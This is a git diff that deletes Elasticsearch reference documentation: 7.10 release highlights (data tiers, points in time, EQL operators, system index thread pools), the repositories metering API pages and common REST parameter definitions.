{es-pull}40661[#40661] (issue: {es-issue}40640[#40640]) - -Search:: -* Don't omit empty arrays when filtering _source {es-pull}56527[#56527] (issues: {es-issue}20736[#20736], {es-issue}22593[#22593], {es-issue}23796[#23796]) -* Fix casting of scaled_float in sorts {es-pull}57207[#57207] - -Snapshot/Restore:: -* Account for recovery throttling when restoring snapshot {es-pull}58658[#58658] (issue: {es-issue}57023[#57023]) -* Fix noisy logging during snapshot delete {es-pull}56264[#56264] -* Fix S3ClientSettings leak {es-pull}56703[#56703] (issue: {es-issue}56702[#56702]) - - - -[[upgrade-7.9.0]] -[discrete] -=== Upgrades - -Search:: -* Update to lucene snapshot e7c625430ed {es-pull}57981[#57981] diff --git a/docs/reference/release-notes/highlights.asciidoc b/docs/reference/release-notes/highlights.asciidoc deleted file mode 100644 index 85cb4943b61..00000000000 --- a/docs/reference/release-notes/highlights.asciidoc +++ /dev/null @@ -1,260 +0,0 @@ -[[release-highlights]] -== What's new in {minor-version} - -Here are the highlights of what's new and improved in {es} {minor-version}! 
-ifeval::["{release-state}"!="unreleased"]
-For detailed information about this release, see the
-<> and
-<>.
-endif::[]
-
-// Add previous release to the list
-Other versions:
-{ref-bare}/7.9/release-highlights.html[7.9]
-| {ref-bare}/7.8/release-highlights.html[7.8]
-| {ref-bare}/7.7/release-highlights.html[7.7]
-| {ref-bare}/7.6/release-highlights-7.6.0.html[7.6]
-| {ref-bare}/7.5/release-highlights-7.5.0.html[7.5]
-| {ref-bare}/7.4/release-highlights-7.4.0.html[7.4]
-| {ref-bare}/7.3/release-highlights-7.3.0.html[7.3]
-| {ref-bare}/7.2/release-highlights-7.2.0.html[7.2]
-| {ref-bare}/7.1/release-highlights-7.1.0.html[7.1]
-| {ref-bare}/7.0/release-highlights-7.0.0.html[7.0]
-
-// tag::notable-highlights[]
-[discrete]
-[[indexing-speed-improvement]]
-=== Indexing speed improvement
-
-{es} 7.10 improves indexing speed by up to 20%. We've reduced the coordination
-needed to add entries to the {ref}/index-modules-translog.html[transaction log],
-which allows for more concurrency, and we've also increased the transaction log
-buffer size from `8KB` to `1MB`. However, the heavier the indexing chain, the
-lower the gains: indices that involve many fields, ingest pipelines, or
-full-text indexing are more analysis-intensive and will see smaller
-improvements.
-
-[discrete]
-[[more-space-efficient-indices]]
-=== More space-efficient indices
-
-{es} 7.10 depends on Apache Lucene 8.7, which introduces higher compression of
-stored fields, the part of the index that notably stores the
-{ref}/mapping-source-field.html[`_source`]. On the various data sets that we
-benchmark against, we noticed space reductions between 0% and 10%. This change
-especially helps data sets with lots of redundant data across documents, which
-is typically the case for documents produced by our Observability solutions,
-which repeat metadata about the originating host on every document.
-
-You can configure the {ref}/index-modules.html#index-codec[`index.codec`]
-setting to tell {es} how aggressively to compress stored fields. Both supported
-values, `default` and `best_compression`, get better compression with this
-change.
-
-[discrete]
-[[data-tier-formalization]]
-=== Data tiers
-
-7.10 introduces the concept of formalized data tiers within {es}.
-{ref}/data-tiers.html[Data tiers] are a simple, integrated approach that gives
-users control over optimizing for cost, performance, and breadth/depth of data.
-Prior to this formalization, many users configured their own tier topology
-using custom node attributes and used {ilm-init} to manage the lifecycle and
-location of data within a cluster.
-
-With this formalization, data tiers (content, hot, warm, and cold) can be
-explicitly configured using {ref}/modules-node.html#node-roles[node roles], and
-indices can be configured to be allocated within a specific tier using
-{ref}/data-tier-shard-filtering.html[index-level data tier allocation filtering].
-{ilm-init} will make use of these tiers to
-{ref}/ilm-migrate.html[automatically migrate] data between nodes as an index
-goes through the phases of its lifecycle.
-
-Newly created indices abstracted by a {ref}/data-streams.html[data stream] will
-be allocated to the `data_hot` tier automatically, while standalone indices
-will be allocated to the `data_content` tier automatically. Nodes with the
-pre-existing `data` role are considered to be part of all tiers.
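-
-For example, here is a minimal sketch of tier-based placement, assuming a
-hypothetical standalone index named `my-index-000001` that should prefer warm
-nodes but may fall back to hot nodes if no warm nodes are available:
-
-[source,console]
-----
-PUT /my-index-000001/_settings
-{
-  "index.routing.allocation.include._tier_preference": "data_warm,data_hot"
-}
-----
-// TEST[skip:illustrative sketch against a hypothetical index]
-
-On the node side, a tier is expressed as a role: for instance, setting
-`node.roles: [ data_hot, data_content ]` in `elasticsearch.yml` places a node
-in the hot and content tiers only.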
- - -[discrete] -[[auc-roc-eval-class]] -=== AUC ROC evaluation metrics for classification analysis - -{ml-docs}/ml-dfanalytics-evaluate.html#ml-dfanalytics-class-aucroc[Area under the curve of receiver operating characteristic (AUC ROC)] -is an evaluation metric that has been available for {oldetection} since 7.3 and -now is available for {classification} analysis. AUC ROC represents the -performance of the {classification} process at different predicted probability -thresholds. The true positive rate for a specific class is compared against the -rate of all the other classes combined at the different threshold levels to -create the curve. - - -[discrete] -[[custom-feature-processor-dfa]] -=== Custom feature processors in {dfanalytics} - -Feature processors enable you to extract process features from document fields. -You can use these features in model training and model deployment. Custom -feature processors provide a mechanism to create features that can be used at -search and ingest time and they don’t take up space in the index. -This process more tightly couples feature generation with the resulting model. -The result is simplified model management as both the features and the model can -easily follow the same life cycle. - - -[discrete] -[[points-in-time-for-search]] -=== Points in time (PITs) for search - -In 7.10, we're introducing points in time (PITs), a lightweight way to preserve -index state over searches. PITs improve end-user experience by making UIs more -reactive. - -By default, a search request waits for complete results before returning a -response. For example, a search that retrieves top hits and aggregations returns -a response only after both top hits and aggregations are computed. However, -aggregations are usually slower and more expensive to compute than top hits. -Instead of sending a combined request, you can send two separate requests: one -for top hits and another one for aggregations. With separate search requests, a -UI can display top hits as soon as they're available and display aggregation -data after the slower aggregation request completes. You can use a PIT to ensure -both search requests run on the same data and index state. - -To use a PIT in a search, you must first explicitly create the PIT using the new -{ref}/point-in-time-api.html[open PIT API]. PITs get automatically garbage-collected -after `keep_alive` if no follow-up request extends their duration. - -[source,console] ----- -POST /my-index-000001/_pit?keep_alive=1m ----- -// TEST[setup:my_index] - -The API returns a PIT ID you can use in search requests. You can also -configure by how long to extend your PIT's lifespan using the search request's -`keep_alive` parameter. - -[source,console] ----- -POST /_search -{ - "size": 100, - "query": { - "match" : { - "title" : "elasticsearch" - } - }, - "pit": { - "id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA==", - "keep_alive": "1m" - } -} ----- -// TEST[catch:missing] - -PITs automatically close when their `keep_alive` period ends. You can -also manually close PITs you no longer need using the -{ref}/point-in-time-api.html[close PIT API]. Closing a PIT releases the -resources needed to maintain the PIT's index state. 
- -[source,console] ----- -DELETE /_pit -{ - "id" : "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWIBBXV1aWQyAAA=" -} ----- -// TEST[catch:missing] - -For more information about using PITs in search, see -{ref}/paginate-search-results.html#search-after[Paginate search results with -`search_after`] or the {ref}/point-in-time-api.html[PIT API documentation]. - -[discrete] -[[support-for-request-level-circuit-breakers]] -=== Request-level circuit breakers on coordinating nodes - -You can now use a coordinating node to account for memory used to perform -partial and final reduce of aggregations in the request circuit breaker. The -search coordinator adds the memory that it used to save and reduce the results -of shard aggregations in the request circuit breaker. Before any partial or -final reduce, the memory needed to reduce the aggregations is estimated and a -CircuitBreakingException is thrown if exceeds the maximum memory allowed in this -breaker. - -This size is estimated as roughly 1.5 times the size of the serialized -aggregations that need to be reduced. This estimation can be completely off for -some aggregations but it is corrected with the real size after the reduce -completes. If the reduce is successful, we update the circuit breaker to remove -the size of the source aggregations and replace the estimation with the -serialized size of the newly reduced result. - -[discrete] -[[eql-case-sensitivity-operator]] -=== EQL: Case-sensitivity and the `:` operator - -In 7.10, we made most EQL operators and functions case-sensitive by default. -We've also added `:`, a new case-insensitive equal operator. Designed for -security use cases, you can use the `:` operator to search for strings in -Windows event logs and other event data containing a mix of letter cases. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where process.executable : "c:\\\\windows\\\\system32\\\\cmd.exe" - """ -} ----- -// TEST[setup:sec_logs] - -For more information, see the {ref}/eql-syntax.html[EQL -syntax documentation]. - -[discrete] -[[deprecate-rest-api-access-to-system-indices]] -=== REST API access to system indices is deprecated - -We are deprecating REST API access to system indices. Most REST API -requests that attempt to access system indices will return the following -deprecation warning: - -[source,text] ----- -this request accesses system indices: [.system_index_name], but in a future -major version, direct access to system indices will be prevented by default ----- - -The following REST API endpoints access system indices as part of their -implementation and will not return the deprecation warning: - -* `GET _cluster/health` -* `GET {index}/_recovery` -* `GET _cluster/allocation/explain` -* `GET _cluster/state` -* `POST _cluster/reroute` -* `GET {index}/_stats` -* `GET {index}/_segments` -* `GET {index}/_shard_stores` -* `GET _cat/[indices,aliases,health,recovery,shards,segments]` - -We are also adding a new metadata flag to track indices. {es} will automatically -add this flag to any existing system indices during upgrade. - -[discrete] -[[add-system-read-thread-pool]] -=== New thread pools for system indices - -We've added two new thread pools for system indices: `system_read` and -`system_write`. These thread pools ensure system indices critical to the Elastic -Stack, such as those used by security or Kibana, remain responsive when -a cluster is under heavy query or indexing load. 
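Before the sizing details below, note that both pools should show up in the cat thread pool API on an upgraded node. A quick, illustrative check (the column list is only a suggestion):

[source,console]
----
GET /_cat/thread_pool/system_read,system_write?v=true&h=node_name,name,size,queue_size
----
// TEST[skip:illustrative check of the new thread pools]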
- -`system_read` is a `fixed` thread pool used to manage resources for -read operations targeting system indices. Similarly, `system_write` is a -`fixed` thread pool used to manage resources for write operations targeting -system indices. Both have a maximum number of threads equal to `5` -or half of the available processors, whichever is smaller. -// end::notable-highlights[] diff --git a/docs/reference/repositories-metering-api/apis/clear-repositories-metering-archive.asciidoc b/docs/reference/repositories-metering-api/apis/clear-repositories-metering-archive.asciidoc deleted file mode 100644 index 2a4ff84e2ec..00000000000 --- a/docs/reference/repositories-metering-api/apis/clear-repositories-metering-archive.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[clear-repositories-metering-archive-api]] -=== Clear repositories metering archive -++++ -Clear repositories metering archive -++++ - -Removes the archived repositories metering information present in the cluster. - -[[clear-repositories-metering-archive-api-request]] -==== {api-request-title} - -`DELETE /_nodes//_repositories_metering/` - -[[clear-repositories-metering-archive-ap-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[clear-repositories-metering-archive-api-desc]] -==== {api-description-title} - -You can use this API to clear the archived repositories metering information in the cluster. - -[[clear-repositories-metering-archive-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - -``:: - (long) Specifies the maximum <> to be cleared from the archive. - -All the nodes selective options are explained <>. -[role="child_attributes"] -[[clear-repositories-metering-archive-api-response-body]] -==== {api-response-body-title} -Returns the deleted archived repositories metering information. - -include::{es-repo-dir}/repositories-metering-api/apis/repositories-meterings-body.asciidoc[tag=repositories-metering-body] diff --git a/docs/reference/repositories-metering-api/apis/get-repositories-metering.asciidoc b/docs/reference/repositories-metering-api/apis/get-repositories-metering.asciidoc deleted file mode 100644 index 86b2a61e3e9..00000000000 --- a/docs/reference/repositories-metering-api/apis/get-repositories-metering.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-repositories-metering-api]] -=== Get repositories metering information -++++ -Get repositories metering information -++++ - -Returns cluster repositories metering information. - -[[get-repositories-metering-api-request]] -==== {api-request-title} - -`GET /_nodes//_repositories_metering` - -[[get-repositories-metering-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[get-repositories-metering-api-desc]] -==== {api-description-title} - -You can use the cluster repositories metering API to retrieve repositories metering information in a cluster. - -This API exposes monotonically non-decreasing counters and it's expected that clients would durably store -the information needed to compute aggregations over a period of time. Additionally, the information -exposed by this API is volatile, meaning that it won't be present after node restarts. 
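As a sketch of how a client might poll these counters, the request below targets every node with the `_all` node filter; in practice the caller is expected to persist the returned counts, since they do not survive a node restart.

[source,console]
----
GET /_nodes/_all/_repositories_metering
----
// TEST[skip:illustrative request, the cluster may have no repositories registered]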
- -[[get-repositories-metering-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - -All the nodes selective options are explained <>. - -[role="child_attributes"] -[[get-repositories-metering-api-response-body]] -==== {api-response-body-title} -include::{es-repo-dir}/repositories-metering-api/apis/repositories-meterings-body.asciidoc[tag=repositories-metering-body] diff --git a/docs/reference/repositories-metering-api/apis/repositories-meterings-body.asciidoc b/docs/reference/repositories-metering-api/apis/repositories-meterings-body.asciidoc deleted file mode 100644 index c92c0311f81..00000000000 --- a/docs/reference/repositories-metering-api/apis/repositories-meterings-body.asciidoc +++ /dev/null @@ -1,178 +0,0 @@ -tag::repositories-metering-body[] -`_nodes`:: -(object) -Contains statistics about the number of nodes selected by the request. -+ -.Properties of `_nodes` -[%collapsible%open] -==== -`total`:: -(integer) -Total number of nodes selected by the request. - -`successful`:: -(integer) -Number of nodes that responded successfully to the request. - -`failed`:: -(integer) -Number of nodes that rejected the request or failed to respond. If this value -is not `0`, a reason for the rejection or failure is included in the response. -==== - -`cluster_name`:: -(string) -Name of the cluster. Based on the <> setting. - -`nodes`:: -(object) -Contains repositories metering information for the nodes selected by the request. -+ -.Properties of `nodes` -[%collapsible%open] -==== -``:: -(array) -An array of repository metering information for the node. -+ -.Properties of objects in `node_id` -[%collapsible%open] -===== -`repository_name`:: -(string) -Repository name. - -`repository_type`:: -(string) -Repository type. - -`repository_location`:: -(object) -Represents an unique location within the repository. -+ -.Properties of `repository_location` for repository type `Azure` -[%collapsible%open] -====== -`base_path`:: -(string) -The path within the container where the repository stores data. - -`container`:: -(string) -Container name. -====== -+ -.Properties of `repository_location` for repository type `GCP` -[%collapsible%open] -====== -`base_path`:: -(string) -The path within the bucket where the repository stores data. - -`bucket`:: -(string) -Bucket name. -====== -+ -.Properties of `repository_location` for repository type `S3` -[%collapsible%open] -====== -`base_path`:: -(string) -The path within the bucket where the repository stores data. - -`bucket`:: -(string) -Bucket name. -====== -`repository_ephemeral_id`:: -(string) -An identifier that changes every time the repository is updated. - -`repository_started_at`:: -(long) -Time the repository was created or updated. Recorded in milliseconds -since the https://en.wikipedia.org/wiki/Unix_time[Unix Epoch]. - -`repository_stopped_at`:: -(Optional, long) -Time the repository was deleted or updated. Recorded in milliseconds -since the https://en.wikipedia.org/wiki/Unix_time[Unix Epoch]. - -`archived`:: -(Boolean) -A flag that tells whether or not this object has been archived. -When a repository is closed or updated the repository metering information -is archived and kept for a certain period of time. This allows retrieving -the repository metering information of previous repository instantiations. 
- -`archive_version`:: -(Optional, long) -The cluster state version when this object was archived, this field -can be used as a logical timestamp to delete all the archived metrics up -to an observed version. This field is only present for archived -repository metering information objects. The main purpose of this -field is to avoid possible race conditions during repository metering -information deletions, i.e. deleting archived repositories metering -information that we haven't observed yet. - -`request_counts`:: -(object) -An object with the number of request performed against the repository -grouped by request type. -+ -.Properties of `request_counts` for repository type `Azure` -[%collapsible%open] -====== -`GetBlobProperties`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/get-blob-properties[Get Blob Properties] requests. -`GetBlob`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/get-blob[Get Blob] requests. -`ListBlobs`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs[List Blobs] requests. -`PutBlob`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/put-blob[Put Blob] requests. -`PutBlock`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/put-block[Put Block]. -`PutBlockList`:: -(long) Number of https://docs.microsoft.com/en-us/rest/api/storageservices/put-block-list[Put Block List] requests. - -Azure storage https://azure.microsoft.com/en-us/pricing/details/storage/blobs/[pricing]. -====== -+ -.Properties of `request_counts` for repository type `GCP` -[%collapsible%open] -====== -`GetObject`:: -(long) Number of https://cloud.google.com/storage/docs/json_api/v1/objects/get[get object] requests. -`ListObjects`:: -(long) Number of https://cloud.google.com/storage/docs/json_api/v1/objects/list[list objects] requests. -`InsertObject`:: -(long) Number of https://cloud.google.com/storage/docs/json_api/v1/objects/insert[insert object] requests, -including https://cloud.google.com/storage/docs/uploading-objects[simple], https://cloud.google.com/storage/docs/json_api/v1/how-tos/multipart-upload[multipart] and -https://cloud.google.com/storage/docs/resumable-uploads[resumable] uploads. Resumable uploads can perform multiple http requests to -insert a single object but they are considered as a single request since they are https://cloud.google.com/storage/docs/resumable-uploads#introduction[billed] as an individual operation. - -Google Cloud storage https://cloud.google.com/storage/pricing[pricing]. -====== -+ -.Properties of `request_counts` for repository type `S3` -[%collapsible%open] -====== -`GetObject`:: -(long) Number of https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetObject.html[GetObject] requests. -`ListObjects`:: -(long) Number of https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjects.html[ListObjects] requests. -`PutObject`:: -(long) Number of https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html[PutObject] requests. -`PutMultipartObject`:: -(long) Number of https://docs.aws.amazon.com/AmazonS3/latest/dev/mpuoverview.html[Multipart] requests, -including https://docs.aws.amazon.com/AmazonS3/latest/API/API_CreateMultipartUpload.html[CreateMultipartUpload], -https://docs.aws.amazon.com/AmazonS3/latest/API/API_UploadPart.html[UploadPart] and https://docs.aws.amazon.com/AmazonS3/latest/API/API_CompleteMultipartUpload.html[CompleteMultipartUpload] -requests. 
- -Amazon Web Services Simple Storage Service https://aws.amazon.com/s3/pricing/[pricing]. -====== -===== -==== -end::repositories-metering-body[] diff --git a/docs/reference/repositories-metering-api/repositories-metering-apis.asciidoc b/docs/reference/repositories-metering-api/repositories-metering-apis.asciidoc deleted file mode 100644 index 7d6a0b8da0a..00000000000 --- a/docs/reference/repositories-metering-api/repositories-metering-apis.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[repositories-metering-apis]] -== Repositories metering APIs - -experimental[] - -You can use the following APIs to retrieve repositories metering information. - -This is an API used by Elastic's commercial offerings. - -* <> -* <> - -include::apis/get-repositories-metering.asciidoc[] -include::apis/clear-repositories-metering-archive.asciidoc[] diff --git a/docs/reference/rest-api/common-parms.asciidoc b/docs/reference/rest-api/common-parms.asciidoc deleted file mode 100644 index d615b28470d..00000000000 --- a/docs/reference/rest-api/common-parms.asciidoc +++ /dev/null @@ -1,1102 +0,0 @@ - - -tag::actions[] -`actions`:: -+ --- -(Optional, string) -Comma-separated list or wildcard expression -of actions used to limit the request. - -Omit this parameter to return all actions. --- -end::actions[] - -tag::active-only[] -`active_only`:: -(Optional, Boolean) -If `true`, -the response only includes ongoing shard recoveries. -Defaults to `false`. -end::active-only[] - -tag::index-alias[] -Comma-separated list or wildcard expression of index alias names -used to limit the request. -end::index-alias[] - -tag::aliases[] -`aliases`:: -(Optional, <>) Index aliases which include the -index. See <>. -end::aliases[] - -tag::index-alias-filter[] -<> -used to limit the index alias. -+ -If specified, -the index alias only applies to documents returned by the filter. -end::index-alias-filter[] - -tag::target-index-aliases[] -`aliases`:: -(Optional, <>) -Index aliases which include the target index. -See <>. -end::target-index-aliases[] - -tag::allow-no-indices[] -`allow_no_indices`:: -(Optional, Boolean) -If `false`, the request returns an error if any wildcard expression, -<>, or `_all` value targets only missing or closed -indices. This behavior applies even if the request targets other open indices. -For example, a request targeting `foo*,bar*` returns an error if an index -starts with `foo` but no index starts with `bar`. -end::allow-no-indices[] - -tag::allow-no-match-transforms1[] -Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no {transforms} that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. - -The default value is `true`, which returns an empty `transforms` array when -there are no matches and the subset of results when there are partial matches. - -If this parameter is `false`, the request returns a `404` status code when there -are no matches or only partial matches. --- -end::allow-no-match-transforms1[] - -tag::allow-no-match-transforms2[] -Specifies what to do when the request: -+ --- -* Contains wildcard expressions and there are no {transforms} that match. -* Contains the `_all` string or no identifiers and there are no matches. -* Contains wildcard expressions and there are only partial matches. - -The default value is `true`, which returns a successful acknowledgement message -when there are no matches. 
When there are only partial matches, the API stops -the appropriate {transforms}. For example, if the request contains -`test-id1*,test-id2*` as the identifiers and there are no {transforms} -that match `test-id2*`, the API nonetheless stops the {transforms} -that match `test-id1*`. - -If this parameter is `false`, the request returns a `404` status code when there -are no matches or only partial matches. --- -end::allow-no-match-transforms2[] - -tag::analyzer[] -`analyzer`:: -(Optional, string) Analyzer to use for the query string. -end::analyzer[] - -tag::analyze_wildcard[] -`analyze_wildcard`:: -(Optional, Boolean) If `true`, wildcard and prefix queries are -analyzed. Defaults to `false`. -end::analyze_wildcard[] - -tag::bytes[] -`bytes`:: -(Optional, <>) Unit used to display byte values. -end::bytes[] - -tag::checkpointing-changes-last-detected-at[] -The timestamp when changes were last detected in the source indices. -end::checkpointing-changes-last-detected-at[] - -tag::cluster-health-status[] -(string) -Health status of the cluster, based on the state of its primary and replica -shards. Statuses are: - - `green`::: - All shards are assigned. - - `yellow`::: - All primary shards are assigned, but one or more replica shards are - unassigned. If a node in the cluster fails, some - data could be unavailable until that node is repaired. - - `red`::: - One or more primary shards are unassigned, so some data is unavailable. This - can occur briefly during cluster startup as primary shards are assigned. -end::cluster-health-status[] - -tag::committed[] -If `true`, -the segments is synced to disk. Segments that are synced can survive a hard reboot. -+ -If `false`, -the data from uncommitted segments is also stored in -the transaction log so that Elasticsearch is able to replay -changes on the next start. -end::committed[] - -tag::completion-fields[] -`completion_fields`:: -(Optional, string) -Comma-separated list or wildcard expressions of fields -to include in `fielddata` and `suggest` statistics. -end::completion-fields[] - -tag::default_operator[] -`default_operator`:: -(Optional, string) The default operator for query string query: AND or OR. -Defaults to `OR`. -end::default_operator[] - -tag::dest[] -The destination for the {transform}. -end::dest[] - -tag::dest-index[] -The _destination index_ for the {transform}. The mappings of the destination -index are deduced based on the source fields when possible. If alternate -mappings are required, use the -https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-create-index.html[Create index API] -prior to starting the {transform}. -end::dest-index[] - -tag::dest-pipeline[] -The unique identifier for a <>. -end::dest-pipeline[] - -tag::detailed[] -`detailed`:: -(Optional, Boolean) -If `true`, -the response includes detailed information about shard recoveries. -Defaults to `false`. -end::detailed[] - -tag::df[] -`df`:: -(Optional, string) Field to use as default where no field prefix is -given in the query string. -end::df[] - -tag::docs-count[] -The number of documents as reported by Lucene. This excludes deleted documents -and counts any <> separately from their parents. It -also excludes documents which were indexed recently and do not yet belong to a -segment. -end::docs-count[] - -tag::docs-deleted[] -The number of deleted documents as reported by Lucene, which may be higher or -lower than the number of delete operations you have performed. 
This number -excludes deletes that were performed recently and do not yet belong to a -segment. Deleted documents are cleaned up by the -<> if it makes sense to do so. -Also, {es} creates extra deleted documents to internally track the recent -history of operations on a shard. -end::docs-deleted[] - -tag::docs-indexed[] -The number of documents that have been indexed into the destination index -for the {transform}. -end::docs-indexed[] - -tag::docs-processed[] -The number of documents that have been processed from the source index of -the {transform}. -end::docs-processed[] - -tag::enrich-policy[] -Enrich policy name -used to limit the request. -end::enrich-policy[] - -tag::expand-wildcards[] -`expand_wildcards`:: -+ --- -(Optional, string) Controls what kind of indices that wildcard expressions can -expand to. Multiple values are accepted when separated by a comma, as in -`open,hidden`. Valid values are: - -`all`:: -Expand to open and closed indices, including <>. - -`open`:: -Expand only to open indices. - -`closed`:: -Expand only to closed indices. - -`hidden`:: -Expansion of wildcards will include hidden indices. -Must be combined with `open`, `closed`, or both. - -`none`:: -Wildcard expressions are not accepted. --- -end::expand-wildcards[] - -tag::exponential-avg-checkpoint-duration-ms[] -Exponential moving average of the duration of the checkpoint, in milliseconds. -end::exponential-avg-checkpoint-duration-ms[] - -tag::exponential-avg-documents-indexed[] -Exponential moving average of the number of new documents that have been -indexed. -end::exponential-avg-documents-indexed[] - -tag::exponential-avg-documents-processed[] -Exponential moving average of the number of documents that have been -processed. -end::exponential-avg-documents-processed[] - -tag::field_statistics[] -`field_statistics`:: -(Optional, Boolean) If `true`, the response includes the document count, sum of document frequencies, -and sum of total term frequencies. -Defaults to `true`. -end::field_statistics[] - -tag::fielddata-fields[] -`fielddata_fields`:: -(Optional, string) -Comma-separated list or wildcard expressions of fields -to include in `fielddata` statistics. -end::fielddata-fields[] - -tag::fields[] -`fields`:: -+ --- -(Optional, string) -Comma-separated list or wildcard expressions of fields -to include in the statistics. - -Used as the default list -unless a specific field list is provided -in the `completion_fields` or `fielddata_fields` parameters. --- -end::fields[] - -tag::index-alias-filter[] -<> -used to limit the index alias. -+ -If specified, -the index alias only applies to documents returned by the filter. -end::index-alias-filter[] - -tag::flat-settings[] -`flat_settings`:: -(Optional, Boolean) If `true`, returns settings in flat format. Defaults to -`false`. -end::flat-settings[] - -tag::generation[] -Generation number, such as `0`. {es} increments this generation number -for each segment written. {es} then uses this number to derive the segment name. -end::generation[] - -tag::http-format[] -`format`:: -(Optional, string) Short version of the -https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html[HTTP accept header]. -Valid values include JSON, YAML, etc. -end::http-format[] - -tag::frequency[] -The interval between checks for changes in the source indices when the -{transform} is running continuously. Also determines the retry interval in the -event of transient failures while the {transform} is searching or indexing. The -minimum value is `1s` and the maximum is `1h`. 
The default value is `1m`. -end::frequency[] - -tag::from[] -`from`:: -(Optional, integer) Starting document offset. Defaults to `0`. -end::from[] - -tag::from-transforms[] -Skips the specified number of {transforms}. The default value is `0`. -end::from-transforms[] - -tag::generation[] -Generation number, such as `0`. {es} increments this generation number -for each segment written. {es} then uses this number to derive the segment name. -end::generation[] - -tag::group-by[] -`group_by`:: -+ --- -(Optional, string) -Key used to group tasks in the response. - -Possible values are: - -`nodes`:: -(Default) -Node ID - -`parents`:: -Parent task ID - -`none`:: -Do not group tasks. --- -end::group-by[] - -tag::groups[] -`groups`:: -(Optional, string) -Comma-separated list of search groups -to include in the `search` statistics. -end::groups[] - -tag::cat-h[] -`h`:: -(Optional, string) Comma-separated list of column names to display. -end::cat-h[] - -tag::help[] -`help`:: -(Optional, Boolean) If `true`, the response includes help information. Defaults -to `false`. -end::help[] - -tag::bulk-id[] -`_id`:: -(Optional, string) -The document ID. -If no ID is specified, a document ID is automatically generated. -end::bulk-id[] - -tag::if_primary_term[] -`if_primary_term`:: -(Optional, integer) Only perform the operation if the document has -this primary term. See <>. -end::if_primary_term[] - -tag::if_seq_no[] -`if_seq_no`:: -(Optional, integer) Only perform the operation if the document has this -sequence number. See <>. -end::if_seq_no[] - -tag::ignore_throttled[] -`ignore_throttled`:: -(Optional, Boolean) If `true`, concrete, expanded or aliased indices are -ignored when frozen. Defaults to `true`. -end::ignore_throttled[] - -tag::index-ignore-unavailable[] -`ignore_unavailable`:: -(Optional, Boolean) If `true`, missing or closed indices are not included in the -response. Defaults to `false`. -end::index-ignore-unavailable[] - -tag::include-defaults[] -`include_defaults`:: -(Optional, string) If `true`, return all default settings in the response. -Defaults to `false`. -end::include-defaults[] - -tag::include-segment-file-sizes[] -`include_segment_file_sizes`:: -(Optional, Boolean) -If `true`, the call reports the aggregated disk usage of -each one of the Lucene index files (only applies if segment stats are -requested). Defaults to `false`. -end::include-segment-file-sizes[] - -tag::include-type-name[] -`include_type_name`:: -deprecated:[7.0.0, Mapping types have been deprecated. See <>.] -(Optional, boolean) If `true`, a mapping type is expected in the body of -mappings. Defaults to `false`. -end::include-type-name[] - -tag::include-unloaded-segments[] -`include_unloaded_segments`:: -(Optional, Boolean) If `true`, the response includes information from segments -that are **not** loaded into memory. Defaults to `false`. -end::include-unloaded-segments[] - -tag::index-query-parm[] -`index`:: -(Optional, string) -Comma-separated list or wildcard expression of index names -used to limit the request. -end::index-query-parm[] - -tag::index[] -``:: -(Optional, string) Comma-separated list or wildcard expression of index names -used to limit the request. -end::index[] - -tag::index-failures[] -The number of indexing failures. -end::index-failures[] - -tag::index-time-ms[] -The amount of time spent indexing, in milliseconds. -end::index-time-ms[] - -tag::index-total[] -The number of indices created. 
-end::index-total[] - -tag::bulk-index[] -`_index`:: -(Optional, string) -Name of the data stream, index, or index alias to perform the action on. This -parameter is required if a `` is not specified in the request path. -end::bulk-index[] - -tag::index-metric[] -``:: -+ --- -(Optional, string) -Comma-separated list of metrics used to limit the request. -Supported metrics are: - -`_all`:: -Return all statistics. - -`completion`:: -<> statistics. - -`docs`:: -Number of documents and deleted docs, which have not yet merged out. -<> can affect this statistic. - -`fielddata`:: -<> statistics. - -`flush`:: -<> statistics. - -`get`:: -Get statistics, -including missing stats. - -`indexing`:: -<> statistics. - -`merge`:: -<> statistics. - -`query_cache`:: -<> statistics. - -`refresh`:: -<> statistics. - -`request_cache`:: -<> statistics. - -`search`:: -Search statistics including suggest statistics. -You can include statistics for custom groups -by adding an extra `groups` parameter -(search operations can be associated with one or more groups). -The `groups` parameter accepts a comma separated list of group names. -Use `_all` to return statistics for all groups. - -`segments`:: -Memory use of all open segments. -+ -If the `include_segment_file_sizes` parameter is `true`, -this metric includes the aggregated disk usage -of each Lucene index file. - -`store`:: -Size of the index in <>. - -`suggest`:: -<> statistics. - -`translog`:: -<> statistics. - -`warmer`:: -<> statistics. --- -end::index-metric[] - -tag::index-template[] -``:: -(Required, string) -Comma-separated list of index template names used to limit the request. Wildcard -(`*`) expressions are supported. -end::index-template[] - 